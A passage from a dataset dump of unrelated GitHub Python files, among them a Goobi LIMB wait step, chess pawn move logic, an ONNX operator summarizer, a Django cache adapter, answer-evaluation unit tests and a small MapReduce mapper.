self.getConfigItem('pdf')\n \n # join paths to create absolute paths\n self.limb_dir = os.path.join(limb, process_title)\n self.alto_dir = os.path.join(self.limb_dir, alto)\n self.toc_dir = os.path.join(self.limb_dir, toc)\n self.pdf_input_dir = os.path.join(self.limb_dir, pdf)\n \n # Set destination for paths\n self.goobi_altos = os.path.join(self.command_line.process_path, \n self.getConfigItem('metadata_alto_path', None, 'process_folder_structure'))\n self.goobi_toc = os.path.join(self.command_line.process_path, \n self.getConfigItem('metadata_toc_path', None, 'process_folder_structure'))\n self.goobi_pdf = os.path.join(self.command_line.process_path, \n self.getConfigItem('doc_limbpdf_path', None, 'process_folder_structure'))\n self.valid_exts = self.getConfigItem('valid_file_exts',None, self.valid_exts_section).split(';')\n # Get path for input-files in process folder\n process_path = self.command_line.process_path\n input_files = self.getConfigItem('img_master_path',\n section= self.folder_structure_section) \n self.input_files = os.path.join(process_path,input_files)\n \n # Get retry number and retry-wait time\n self.retry_num = int(self.getConfigItem('retry_num'))\n self.retry_wait = int(self.getConfigItem('retry_wait'))\n \n # Set flag for ignore if files already have been copied to goobi\n self.ignore_goobi_folder = self.getSetting('ignore_goobi_folder', bool, default=True)\n \n def step(self):\n '''\n This script's role is to wait until\n LIMB processing is complete before finishing.\n In the event of a timeout, it reports back to \n previous step before exiting.\n '''\n error = None\n retry_counter = 0\n try:\n self.getVariables()\n # First check if files already have been copied to goobi\n if (not self.ignore_goobi_folder and \n limb_tools.alreadyMoved(self.goobi_toc,self.goobi_pdf,\n self.input_files,self.goobi_altos,\n self.valid_exts)):\n return error\n # keep on retrying for the given number of attempts\n while retry_counter < self.retry_num:\n \n if self.limbIsReady():\n msg = ('LIMB output is ready - exiting.')\n self.debug_message(msg)\n return None # this is the only successful exit possible\n else:\n # if they haven't arrived, sit and wait for a while\n msg = ('LIMB output not ready - sleeping for {0} seconds...')\n msg = msg.format(self.retry_wait)\n self.debug_message(msg)\n retry_counter += 1\n time.sleep(self.retry_wait)\n except IOError as e:\n # if we get an IO error we need to crash\n error = ('Error reading from directory {0}')\n error = error.format(e.strerror)\n return error\n except ValueError as e:\n # caused by conversion of non-numeric strings in config to nums\n error = \"Invalid config data supplied, error: {0}\"\n error = error.format(e.strerror)\n return error\n # if we've gotten this far, we've timed out and need to go back to the previous step\n return \"Timed out waiting for LIMB output.\"\n\n\n \n def limbIsReady(self):\n '''\n Check to see if LIMB is finished\n return boolean\n '''\n try: \n # raises error if one of our directories is missing\n tools.ensureDirsExist(self.limb_dir, self.alto_dir, \\\n self.toc_dir, self.pdf_input_dir, self.input_files)\n except IOError as e:\n msg = ('One of the output folder from LIMB is not yet created.'\n ' Waiting for LIMB to be ready. Error: {0}')\n msg = msg.format(e.strerror)\n self.debug_message(msg)\n return False\n if limb_tools.tocExists(self.toc_dir):\n return True\n if limb_tools.altoFileCountMatches(self.alto_dir, self.input_files):\n return True\n return False\n\nif __name__ == '__main__':\n \n WaitForLimb( ).begin()\n","repo_name":"kb-dk/goobi-scripts","sub_path":"kb/wait_for_limb.py","file_name":"wait_for_limb.py","file_ext":"py","file_size_in_byte":5684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2094456838","text":"from .. values import *\nfrom .piece import *\nfrom .. board import *\n\n\nclass cPawn(cPiece):\n DIRS = { 'north' : 1,\n 'south' : 2,\n 'north-east' : 5,\n 'south-west' : 6,\n 'north-west' : 7,\n 'south-east' : 8,\n '2north' : 9,\n '2south' : 10,\n 'valid' : 13,\n 'undefined' : 14 }\n REVERSE_DIRS = { DIRS['north'] : DIRS['south'],\n DIRS['south'] : DIRS['north'],\n DIRS['north-east'] : DIRS['south-west'],\n DIRS['south-west'] : DIRS['north-east'],\n DIRS['north-west'] : DIRS['south-east'],\n DIRS['south-east'] : DIRS['north-west'],\n DIRS['2north'] : DIRS['2south'],\n DIRS['2south'] : DIRS['2north'],\n DIRS['valid'] : DIRS['valid'],\n DIRS['undefined'] : DIRS['undefined'] }\n STEP_1N_X = 0\n STEP_1N_Y = 1\n STEP_2N_X = 0\n STEP_2N_Y = 2\n STEP_1N1E_X = 1\n STEP_1N1E_Y = 1\n STEP_1N1W_X = -1\n STEP_1N1W_Y = 1\n STEP_1S_X = 0\n STEP_1S_Y = -1\n STEP_2S_X = 0\n STEP_2S_Y = -2\n STEP_1S1E_X = 1\n STEP_1S1E_Y = -1\n STEP_1S1W_X = -1\n STEP_1S1W_Y = -1\n blk = 0\n wRk = 3\n wKn = 4\n wBp = 5\n wQu = 6\n bRk = 11\n bKn = 12\n bBp = 13\n bQu = 14 \n MAXCNT = 1\n\n def __init__(self, match, xpos, ypos):\n super().__init__(match, xpos, ypos)\n if(self.color == COLORS['white']):\n self.STEPS = [ [1, 1], [-1, 1] ]\n self.BACK_STEPS = [ [1, -1], [-1, -1] ]\n if(self.ypos < 6):\n self.GEN_STEPS = [ [[0, 1, PIECES['blk']]], [[0, 2, PIECES['blk']]], [[1, 1, PIECES['blk']]], [[-1, 1, PIECES['blk']]] ]\n else:\n self.GEN_STEPS = [ [[0, 1, PIECES['wQu']], [0, 1, PIECES['wRk']], [0, 1, PIECES['wBp']], [0, 1, PIECES['wKn']]],\n [[1, 1, PIECES['wQu']], [1, 1, PIECES['wRk']], [1, 1, PIECES['wBp']], [1, 1, PIECES['wKn']]],\n [[-1, 1, PIECES['wQu']], [-1, 1, PIECES['wRk']], [-1, 1, PIECES['wBp']], [-1, 1, PIECES['wKn']]] ]\n else:\n self.STEPS = [ [1, -1], [-1, -1] ]\n self.BACK_STEPS = [ [1, 1], [-1, 1] ]\n if(self.ypos > 1):\n self.GEN_STEPS = [ [[0, -1, PIECES['blk']]], [[0, -2, PIECES['blk']]], [[-1, -1, PIECES['blk']]], [[1, -1, PIECES['blk']]] ]\n else:\n self.GEN_STEPS = [ [[0, -1, PIECES['bQu']], [0, -1, PIECES['bRk']], [0, -1, PIECES['bBp']], [0, -1, PIECES['bKn']]],\n [[1, -1, PIECES['bQu']], [1, -1, PIECES['bRk']], [1, -1, PIECES['bBp']], [1, -1, PIECES['bKn']]],\n [[-1, -1, PIECES['bQu']], [-1, -1, PIECES['bRk']], [-1, -1, PIECES['bBp']], [-1, -1, PIECES['bKn']]] ]\n\n @classmethod\n def dir_for_move(cls, srcx, srcy, dstx, dsty):\n step_x = dstx - srcx\n step_y = dsty - srcy\n if(step_x == cls.STEP_1N_X and step_y == cls.STEP_1N_Y):\n return cls.DIRS['north']\n elif(step_x == cls.STEP_2N_X and step_y == cls.STEP_2N_Y and \n srcy == cBoard.COORD['2']):\n return cls.DIRS['2north']\n elif(step_x == cls.STEP_1N1E_X and step_y == cls.STEP_1N1E_Y):\n return cls.DIRS['north-east']\n elif(step_x == cls.STEP_1N1W_X and step_y == cls.STEP_1N1W_Y):\n return cls.DIRS['north-west']\n elif(step_x == cls.STEP_1S_X and step_y == cls.STEP_1S_Y):\n return cls.DIRS['south']\n elif(step_x == cls.STEP_2S_X and step_y == cls.STEP_2S_Y and \n srcy == cBoard.COORD['7']):\n return cls.DIRS['2south']\n elif(step_x == cls.STEP_1S1E_X and step_y == cls.STEP_1S1E_Y):\n return cls.DIRS['south-east']\n elif(step_x == cls.STEP_1S1W_X and step_y == cls.STEP_1S1W_Y):\n return cls.DIRS['south-west']\n else:\n return cls.DIRS['undefined']\n\n #step_for_dir(direction):\n # not used for pawn\n\n def is_trapped(self):\n return False # pawn cannot be trapped\n\n #is_piece_stuck(self):\n # works with inherited class\n\n #is_move_stuck(self, dstx, dsty)\n # works with inherited class\n\n def is_move_valid(self, dstx, dsty, prom_piece):\n move_dir = self.dir_for_move(self.xpos, self.ypos, dstx, dsty)\n if(move_dir == self.DIRS['undefined']):\n return False\n\n pin_dir = self.match.eval_pin_dir(self.xpos, self.ypos)\n\n dstpiece = self.match.readfield(dstx, dsty)\n\n if(self.color == COLORS['white']):\n # check pins\n if(move_dir == self.DIRS['north'] or move_dir == self.DIRS['2north']):\n if(pin_dir != self.DIRS['north'] and pin_dir != self.DIRS['south'] and pin_dir != self.DIRS['undefined']):\n return False\n elif(move_dir == self.DIRS['north-west']):\n if(pin_dir != self.DIRS['north-west'] and pin_dir != self.DIRS['south-east'] and pin_dir != self.DIRS['undefined']):\n return False\n elif(move_dir == self.DIRS['north-east']):\n if(pin_dir != self.DIRS['north-east'] and pin_dir != self.DIRS['south-west'] and pin_dir != self.DIRS['undefined']):\n return False\n else:\n return False\n\n # check fields\n if(move_dir == self.DIRS['north'] and dstpiece != PIECES['blk']):\n return False\n elif(move_dir == self.DIRS['2north']):\n midpiece = self.match.readfield(dstx, self.ypos + self.STEP_1N_Y)\n if(midpiece != PIECES['blk'] or dstpiece != PIECES['blk']):\n return False\n elif(move_dir == self.DIRS['north-west'] or move_dir == self.DIRS['north-east']):\n if(self.match.color_of_piece(dstpiece) != COLORS['black']):\n return self.is_white_ep_move_ok(dstx, dsty)\n\n # check promotion\n if(dsty == 7 and prom_piece != PIECES['wQu'] and \n prom_piece != PIECES['wRk'] and \n prom_piece != PIECES['wBp'] and \n prom_piece != PIECES['wKn']):\n return False\n elif(dsty < 7 and prom_piece != PIECES['blk']):\n return False\n else:\n # check pins\n if(move_dir == self.DIRS['south'] or move_dir == self.DIRS['2south']):\n if(pin_dir != self.DIRS['north'] and pin_dir != self.DIRS['south'] and pin_dir != self.DIRS['undefined']):\n return False\n elif(move_dir == self.DIRS['south-east']):\n if(pin_dir != self.DIRS['north-west'] and pin_dir != self.DIRS['south-east'] and pin_dir != self.DIRS['undefined']):\n return False\n elif(move_dir == self.DIRS['south-west']):\n if(pin_dir != self.DIRS['north-east'] and pin_dir != self.DIRS['south-west'] and pin_dir != self.DIRS['undefined']):\n return False\n else:\n return False\n \n # check fields\n if(move_dir == self.DIRS['south'] and dstpiece != PIECES['blk']):\n return False\n elif(move_dir == self.DIRS['2south']):\n midpiece = self.match.readfield(dstx, self.ypos + self.STEP_1S_Y)\n if(midpiece != PIECES['blk'] or dstpiece != PIECES['blk']):\n return False\n elif(move_dir == self.DIRS['south-east'] or move_dir == self.DIRS['south-west']):\n if(self.match.color_of_piece(dstpiece) != COLORS['white']):\n return self.is_black_ep_move_ok(dstx, dsty)\n\n # check promotion\n if(dsty == 0 and prom_piece != PIECES['bQu'] and \n prom_piece != PIECES['bRk'] and \n prom_piece != PIECES['bBp'] and \n prom_piece != PIECES['bKn']):\n return False\n elif(dsty > 0 and prom_piece != PIECES['blk']):\n return False\n\n return True\n\n def do_move(self, dstx, dsty, prom_piece):\n move = cMove(self.match, \n self.match.movecnt() + 1, \n cMove.TYPES['standard'],\n self.xpos, \n self.ypos, \n dstx, \n dsty, \n None, \n None,\n PIECES['blk'], \n prom_piece, \n self.match.board.fifty_moves_count)\n\n dstpiece = self.match.readfield(move.dstx, move.dsty)\n \n if(prom_piece != PIECES['blk']):\n move.move_type = cMove.TYPES['promotion']\n move.captured_piece = dstpiece\n self.match.writefield(self.xpos, self.ypos, PIECES['blk'])\n self.match.writefield(dstx, dsty, prom_piece)\n self.match.score -= (SCORES[prom_piece] - SCORES[self.piece])\n self.match.score += SCORES[dstpiece]\n elif(dstpiece == PIECES['blk'] and self.xpos != dstx):\n move.move_type = cMove.TYPES['en_passant']\n move.e_p_fieldx = dstx\n move.e_p_fieldy = self.ypos\n move.captured_piece = self.match.readfield(move.e_p_fieldx, move.e_p_fieldy)\n self.match.writefield(self.xpos, self.ypos, PIECES['blk'])\n self.match.writefield(dstx, dsty, self.piece)\n self.match.writefield(move.e_p_fieldx, move.e_p_fieldy, PIECES['blk'])\n self.match.score += SCORES[move.captured_piece]\n else:\n move.captured_piece = dstpiece\n self.match.writefield(self.xpos, self.ypos, PIECES['blk'])\n self.match.writefield(dstx, dsty, self.piece)\n self.match.score += SCORES[dstpiece]\n\n if(self.match.color_of_piece(self.piece) == COLORS['white']):\n self.match.board.domove_white_movecnt_short_castling_lost(move.srcx, move.srcy, move.count)\n self.match.board.domove_white_movecnt_long_castling_lost(move.srcx, move.srcy, move.count)\n else:\n self.match.board.domove_black_movecnt_short_castling_lost(move.srcx, move.srcy, move.count)\n self.match.board.domove_black_movecnt_long_castling_lost(move.srcx, move.srcy, move.count)\n\n self.match.board.domove_counter(dstpiece)\n self.match.board.domove_fifty_moves_count(self.piece, dstpiece)\n\n self.match.move_list.append(move)\n return move\n\n def undo_move(self, move):\n if(move.move_type == move.TYPES['standard']):\n self.match.writefield(move.srcx, move.srcy, self.piece)\n self.match.writefield(move.dstx, move.dsty, move.captured_piece)\n self.match.score -= SCORES[move.captured_piece]\n elif(move.move_type == move.TYPES['promotion']):\n if(self.match.color_of_piece(self.piece) == COLORS['white']):\n origin = PIECES['wPw']\n else:\n origin = PIECES['bPw']\n self.match.writefield(move.srcx, move.srcy, origin)\n self.match.writefield(move.dstx, move.dsty, move.captured_piece)\n self.match.score += (SCORES[move.prom_piece] - SCORES[origin])\n self.match.score -= SCORES[move.captured_piece]\n elif(move.move_type == move.TYPES['en_passant']):\n self.match.writefield(move.srcx, move.srcy, self.piece)\n self.match.writefield(move.dstx, move.dsty, PIECES['blk'])\n self.match.writefield(move.e_p_fieldx, move.e_p_fieldy, move.captured_piece)\n self.match.score -= SCORES[move.captured_piece]\n\n if(self.match.color_of_piece(self.piece) == COLORS['white']):\n self.match.board.undomove_white_movecnt_short_castling_lost(move)\n self.match.board.undomove_white_movecnt_long_castling_lost(move)\n else:\n self.match.board.undomove_black_movecnt_short_castling_lost(move)\n self.match.board.undomove_black_movecnt_long_castling_lost(move)\n\n self.match.board.undomove_counter(move)\n self.match.board.undomove_fifty_moves_count(move)\n return move\n\n def is_white_ep_move_ok(self, dstx, dsty):\n if(len(self.match.move_list) == 0):\n return False\n else:\n lastmove = self.match.move_list[-1]\n\n dstpiece = self.match.readfield(dstx, dsty)\n enemy = self.match.readfield(lastmove.dstx, lastmove.dsty)\n if(dstpiece == PIECES['blk'] and enemy == PIECES['bPw']):\n if(lastmove.srcy - lastmove.dsty == 2 and \n lastmove.dsty == self.ypos and \n lastmove.dstx == dstx and \n lastmove.dsty - dsty == -1):\n return True\n return False\n\n def is_black_ep_move_ok(self, dstx, dsty):\n if(len(self.match.move_list) == 0):\n return False\n else:\n lastmove = self.match.move_list[-1]\n\n dstpiece = self.match.readfield(dstx, dsty)\n enemy = self.match.readfield(lastmove.dstx, lastmove.dsty)\n if(dstpiece == PIECES['blk'] and enemy == PIECES['wPw']):\n if(lastmove.srcy - lastmove.dsty == -2 and \n lastmove.dsty == self.ypos and \n lastmove.dstx == dstx and \n lastmove.dsty - dsty == 1):\n return True\n return False\n\n #find_attacks_and_supports(self, attacked, supported):\n # works with inherited class\n\n #forks(self):\n # works with inherited class\n\n #defends_fork(self)\n # works with inherited class\n\n #move_defends_fork(self, dstx, dsty)\n # works with inherited class\n\n def move_controles_file(self, dstx, dsty):\n return False\n\n #score_touches(self):\n # works with inherited class\n\n # list_moves(self):\n # works with inherited class\n\n # generate_moves(self):\n # works with inherited class\n\n # generate_priomoves(self):\n # works with inherited class\n\n def is_running(self):\n if(self.color == COLORS['white']):\n stepx = 0\n stepy = 1\n opp_pawn = PIECES['bPw']\n else:\n stepx = 0\n stepy = -1\n opp_pawn = PIECES['wPw']\n for i in range(-1, 2, 1):\n x1 = self.xpos + i\n y1 = self.ypos\n while(True):\n x1, y1 = self.match.search(x1, y1, stepx, stepy)\n if(x1 is not None):\n piece = self.match.readfield(x1, y1)\n if(piece == opp_pawn):\n return False\n else:\n break\n return True\n\n def is_weak(self):\n from .. analyze_helper import list_all_field_touches\n friends, enemies = list_all_field_touches(self.match, self.color, self.xpos, self.ypos)\n if(len(friends) >= len(enemies)):\n return False\n if(self.color == COLORS['white']):\n stepy = -1\n else:\n stepy = 1\n for i in range(2):\n if(i == 0):\n newx = self.xpos + 1\n else:\n newx = self.xpos - 1\n if(self.match.is_inbounds(newx, self.ypos)):\n x1, y1 = self.match.search(newx, self.ypos, newx, stepy)\n if(x1 is not None):\n piece = self.match.readfield(x1, y1)\n if((piece == PIECES['wPw'] or piece == PIECES['bPw']) and\n self.color == self.match.color_of_piece(piece)):\n return False\n return True\n\n# class end\n\n","repo_name":"richardtraindl/immanuel","sub_path":"kate/engine/pieces/pawn.py","file_name":"pawn.py","file_ext":"py","file_size_in_byte":15678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39095164697","text":"import onnx\nfrom onnx import helper, checker\nfrom onnx import TensorProto\nimport re\nimport argparse\n\n#import json\n#from google.protobuf.json_format import MessageToJson\n#from google.protobuf.json_format import Parse\nimport collections\n\ndef printDict(d, key_string, val_string):\n print('{}\\n{} {}\\n{}'.format('*'*10,key_string,val_string, '-'*10))\n for key, val in d.items():\n print('{} {}'.format(key, val))\n print('{}'.format('*'*10))\n\n\n# Matches a pair of brackets which are not part of comments or not part of strings delimited by \"\"\n# Returns\ndef match_brackets(str):\n pairs = {'(': ')',\n '{': '}',\n '[': ']'}\n ignore_delims={'\"':'\"',\n '#':'\\n'}\n q = []\n # { end_pos: (stat_char, start_pos)}\n pos_pair = collections.OrderedDict()\n pos=0\n ignore_char=None\n for c in str:\n if c in ignore_delims.keys() and ignore_char==None:\n ignore_char=c\n elif ignore_char:\n if c == ignore_delims[ignore_char]:\n ignore_char=None\n elif c in pairs.keys():\n entry = (c,pos)\n q.append(entry)\n elif c in pairs.values():\n if not q:\n return (False, None)\n entry = q.pop()\n if c != pairs[entry[0]]:\n print(str[:pos])\n return (False, None)\n pos_pair[pos]=entry\n pos=pos+1\n return (not q, pos_pair)\n\ndef analyze_onnx(model_file):\n model = onnx.load(model_file)\n graph = model.graph\n # Generate a name for all node if they have none.\n nodeIdx = 0\n opDict = collections.OrderedDict()\n for n in graph.node:\n if n.op_type not in opDict.keys():\n opDict[n.op_type] = 1\n else:\n opDict[n.op_type] = opDict[n.op_type] + 1\n if n.op_type == 'Loop':\n loop_body = \"#\" + str(n.attribute[0])\n loop_name = n.name.replace(\"\\\\\", \"_\")\n loop_name = loop_name.replace(\"/\", '_')\n match, bracket_dict = match_brackets(loop_body)\n if match and bracket_dict:\n last_brace_pos = list(bracket_dict.keys())[-1]\n first_bracket, start_pos = bracket_dict[last_brace_pos]\n loop_body = loop_body[start_pos:last_brace_pos + 1]\n loop_body = \"graph \" + loop_body\n onnxtxt_file = loop_name + '.onnxtxt'\n onnx_file = loop_name + '.onnx'\n print(\"Writing body for loop onnx operator \" + n.name + \" to file \" + onnx_file + \" .\\n\")\n text_file = open(onnxtxt_file, \"w\")\n n = text_file.write(loop_body)\n text_file.close()\n import os\n os.system('protoc onnx.proto --encode=onnx.ModelProto < ' + onnxtxt_file + ' > ' + onnx_file)\n analyze_onnx(onnx_file)\n print(model_file)\n printDict(opDict, 'op', 'count')\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Create a summary of operators in the input onnx file and also dumps'\n ' each loop body as an onnx file and also creates summary for each '\n ' such loop body.')\n parser.add_argument(\"input\", help=\"input onnx model\")\n args = parser.parse_args()\n \n analyze_onnx(args.input)\n\n''' \n text_file = open(\"log.txt\", \"r\")\n #read whole file to a string\n data = text_file.read() \n #close file\n text_file.close()\n convert_model = Parse(data, onnx.ModelProto())\n \n print(convert_model)\n \n s = MessageToJson(onnx_model)\n'''\n","repo_name":"saurabh-shandilya/onnx-utils","sub_path":"onnx_summarize.py","file_name":"onnx_summarize.py","file_ext":"py","file_size_in_byte":3653,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"53"} +{"seq_id":"5088114758","text":"# coding=UTF-8\n'''\n全局管理memcache的调用,封装django自带的cache\n主要用于小数据量的调用\n'''\nfrom django.core.cache import get_cache\nfrom apps.common.utils.utils_collection import genr_sublist\n\n# TODO: wangqi 20151201 这里可以改进成享元模式,如下代码所示\n\n\"\"\"\nclass CacheAdaptar(object):\n\n cache_name_dict = {}\n\n @classmethod\n def get_cache(cls, cache_name):\n pass # 将对应的cache塞入自己的dict中去\n\n\n def get(self, key, default = None):\n pass\n\n def set(self, key, timeout):\n pass\n\n def delete(self, key):\n pass\n\n\nweb_cache = CacheAdpter.get_cache('web')\n\n\"\"\"\n\nclass CacheAdpter():\n\n @classmethod\n def get_time_out(cls, timeout, cache):\n if not timeout:\n timeout = cache.default_timeout\n return timeout\n\n @classmethod\n def get(cls, key, cache_name, default = None):\n use_cache = get_cache(cache_name)\n value = use_cache.get(key)\n if value is None:\n return default\n return value\n\n @classmethod\n def set(cls, key, value, cache_name, timeout = 0):\n use_cache = get_cache(cache_name)\n use_cache.set(key, value, cls.get_time_out(timeout, use_cache))\n\n @classmethod\n def get_many(cls, keys, cache_name, default = {}):\n use_cache = get_cache(cache_name)\n value_dict = use_cache.get_many(keys)\n if value_dict is None:\n return default\n return value_dict\n\n @classmethod\n def set_many(cls, keys, cache_name, timeout = 0):\n use_cache = get_cache(cache_name)\n use_cache.set_many(keys, cls.get_time_out(timeout, use_cache))\n\n @classmethod\n def delete(cls, key, cache_name):\n use_cache = get_cache(cache_name)\n use_cache.delete(key)\n\n @classmethod\n def delete_many(cls, keys, cache_name):\n use_cache = get_cache(cache_name)\n for key in keys:\n use_cache.delete(key)\n\n\n @classmethod\n def set_large_list(cls, key, value_list, split_size, cache_name, timeout = 0):\n if value_list:\n use_cache = get_cache(cache_name)\n value_map = {}\n\n for index, temp_sublist in enumerate(genr_sublist(value_list, split_size)):\n value_map.update({'%s_%s' % (key, index):temp_sublist})\n\n use_cache.set_many(value_map, timeout) # 存入分解后的数据\n use_cache.set(key, index + 1, timeout) # 被分解的N组\n return True\n\n @classmethod\n def get_large_list(cls, key, cache_name):\n use_cache = get_cache(cache_name)\n\n value_list = []\n grp_num = use_cache.get(key)\n if grp_num is None:\n return value_list\n\n keys = [key + '_' + str(i) for i in range(grp_num)]\n value_dict = use_cache.get_many(keys)\n if not value_dict:\n return value_list\n else:\n return reduce(list.__add__, value_dict.values())","repo_name":"Florence3546/CRM","sub_path":"apps/common/utils/utils_cacheadpter.py","file_name":"utils_cacheadpter.py","file_ext":"py","file_size_in_byte":2952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37072247083","text":"from django.shortcuts import render\nfrom .apps import WebappConfig\n\n# Create your views here.\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import get_object_or_404\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom .apps import WebappConfig\nimport numpy as np\n\n\ndef fetch_article_info(dataframe_idx, df):\n info = df.iloc[dataframe_idx]\n meta_dict = dict()\n meta_dict['title'] = info['title']\n meta_dict['description'] = info['description']\n meta_dict['doi'] = info['doi']\n meta_dict['author_count'] = info['author_count']\n meta_dict['author_names'] = info['author_names']\n meta_dict['authkeywords'] = info['authkeywords']\n return meta_dict\n\n\ndef search(self, query, top_k, index, model, df):\n print(index.ntotal)\n query_vector = model.encode(query)\n top_k = index.search(query_vector, top_k)\n top_k_ids = top_k[1].tolist()[0]\n top_k_ids = list(np.unique(top_k_ids))\n results = [self.fetch_article_info(idx, df) for idx in top_k_ids]\n return results\n\n\nclass call_model(APIView):\n def get(self, request):\n if request.method == 'GET':\n # sentence is the query we want to get the prediction for\n params = request.GET.get('query', 'default')\n\n # predict method used to get the prediction\n response = WebappConfig.model.encode([params])\n # response = search(self, query=params, top_k=15, index=WebappConfig.index, model=WebappConfig.model, df=WebappConfig.articles)\n # response = search(self, )\n response = WebappConfig.index.search(response, 15)\n # nice\n # returning JSON response\n return JsonResponse(response.tolist(), safe=False)\n","repo_name":"DavidZhongtai/bert-api","sub_path":"fastbert/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5614173893","text":"import os\r\nimport re\r\n\r\ndef wait(prompt=\"\"):\r\n print(prompt)\r\n input(\"PRESS ANY KEY CONTINUE...\\n\")\r\n\r\npath = \"LyricsText\"\r\n\r\n# pattern = \"([0-9a-z]+ ){1,6}[a-z]+\"\r\n# for filename in os.listdir(path):\r\n# SongName = filename[:-4]\r\n# if re.fullmatch(pattern,SongName):\r\n# SongName=SongName.replace(\" \",\"_\")\r\n# dst = f\"{path}/{SongName}.txt\"\r\n# src = f\"{path}/{filename}\"\r\n# os.rename(src,dst)\r\n\r\n\r\n\r\n# # 15 seconds of fame.txt\r\nwith open(\"LyricsTextClear/15_seconds_of_fame.txt\",\"r\") as fread:\r\n a = fread.read()\r\n print(type(a))","repo_name":"iasonpap/LyricsToAudioAlignment","sub_path":"DAMP_Dataset/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30252341254","text":"# -*- encoding:utf-8 -*-\n\n\"\"\"\nТесты модуля проверки ответов\n\"\"\"\n\nimport unittest\nfrom quiz.answer_evaluation import *\n\n\"\"\"\nДля запуска тестов: python tests.py\n\"\"\"\n\nclass TestSingleChoiceAnswer(unittest.TestCase):\n\n def setUp(self):\n self.ae = AnswerEvaluation.factory(AnswerEvaluation.SINGLE_CHOICE)\n\n def test_without_infelicity(self):\n self.assertEqual(self.ae.estimate(u'инкапсуляция', u'Инкапсуляция'), 1)\n self.assertEqual(self.ae.estimate(u'палиморфизм', u'Полиморфизм'), 0)\n\n def test_with_infelicity(self):\n self.assertEqual(\n self.ae.estimate(u'Инкапсу', u'Инкапсуляция'), 0)\n self.assertGreaterEqual(\n self.ae.estimate(u'Инкапсу', u'Инкапсуляция', 0.45), 0.5)\n self.assertGreaterEqual(\n self.ae.estimate(u'Енкапселция', u'Инкапсуляция', 0.3), 0.8)\n self.assertGreaterEqual(\n self.ae.estimate(u'Палиморфизм', u'Полиморфизм', 0.2), 0.9)\n self.assertGreaterEqual(\n self.ae.estimate(u'Наслiдуване', u'Наследование', 0.3), 0.75)\n self.assertLessEqual(\n self.ae.estimate(u\"успадкування\", u\"Наследование\", 0.9), 0.5)\n\n\nclass TestMultipleChoiceAnswer(unittest.TestCase):\n\n def setUp(self):\n self.ae = AnswerEvaluation.factory(AnswerEvaluation.MULTIPLE_CHOICE)\n self.ref_answers = [u'инкапсуляция', u'полиморфизм', u'наследование']\n\n self.answer1 = [u'инкапсуляция', u'полиморфизм', u'наследование']\n self.answer2 = [u'палиморфзм', u'наследавание']\n self.answer3 = [u'палиморфзм', u'наследавание', u'инкапсуляция']\n self.answer4 = [u'палиморфзм']\n\n def test_without_infelicity(self):\n self.assertEqual(self.ae.estimate( self.answer1,\n {'answers': self.ref_answers}, 0.6), 1)\n\n self.assertEqual(self.ae.estimate(self.answer2,\n {'answers': self.ref_answers}, 0.6), 0)\n\n self.assertEqual(self.ae.estimate(self.answer3,\n {'answers': self.ref_answers}, 0.6), 1)\n\n\n def test_with_infelicity(self):\n self.assertEqual(self.ae.estimate(self.answer2,\n {'answers': self.ref_answers,\n 'infelicity': 2}, 0.6), 0.67)\n self.assertEqual(self.ae.estimate(self.answer4,\n {'answers': self.ref_answers,\n 'infelicity': 2}, 0.6), 0)\n self.assertEqual(self.ae.estimate(self.answer4,\n {'answers': self.ref_answers,\n 'infelicity': 1}, 0.6), 0.33)\n\n\nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"icefairy64/TensorHRTotallyNotABot","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3084,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69797293608","text":"#\n# >>> Escriba el codigo del mapper a partir de este punto <<<\n#\nimport sys\n\n\nfor row in sys.stdin:\n elementos = row.split(\",\")\n \n cantidad = elementos[4]\n purpose = elementos[3]\n linea = purpose + \";\" + cantidad\n sys.stdout.write(linea+\"\\n\")","repo_name":"analitica-de-grandes-datos/mapreduce-en-python-johnma96","sub_path":"pregunta_02/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17399362438","text":"import setuptools\n\nwith open('README.md', 'r') as f:\n readme = f.read()\n\nwith open('requirements.txt', 'r') as f:\n install_requires = f.readlines()\n\ntest_requires = [\n 'fakeredis==1.0.5',\n]\n\nsetuptools.setup(\n name='challenge_w3',\n version='1.0.0',\n author='Mario Apra',\n author_email='mariotapra@gmail.com',\n url='https://github.com/derrix060/challange-w3',\n description='A simple REST API created on the w3 challenge.',\n license='Apache-2.0',\n long_description=readme,\n packages=setuptools.find_packages(exclude=[\"*.tests\", \"*.tests.*\", \"tests.*\", \"tests\"]),\n include_package_data=True,\n package_dir={'challenge_w3': 'challenge_w3'},\n install_requires=install_requires,\n tests_require=test_requires,\n zip_safe=False,\n entry_points={\n 'console_scripts': [\n 'challenge_w3 = challenge_w3.api:main',\n ],\n 'gui_scripts': []\n },\n)\n","repo_name":"derrix060/challange-w3","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31520942498","text":"def count_all(iterable):\n dic = {}\n for element in iterable:\n if element in dic:\n dic[element] += 1\n else:\n dic[element] = 1\n return dic\n\n\n# Master\ndef m_count_all(items):\n counters = {}\n for item in items:\n counters[item] = counters.get(item, 0) + 1\n return counters\n#\n\n\nif __name__ == \"__main__\":\n animals = ['cat', 'dog', 'horse', 'cat']\n 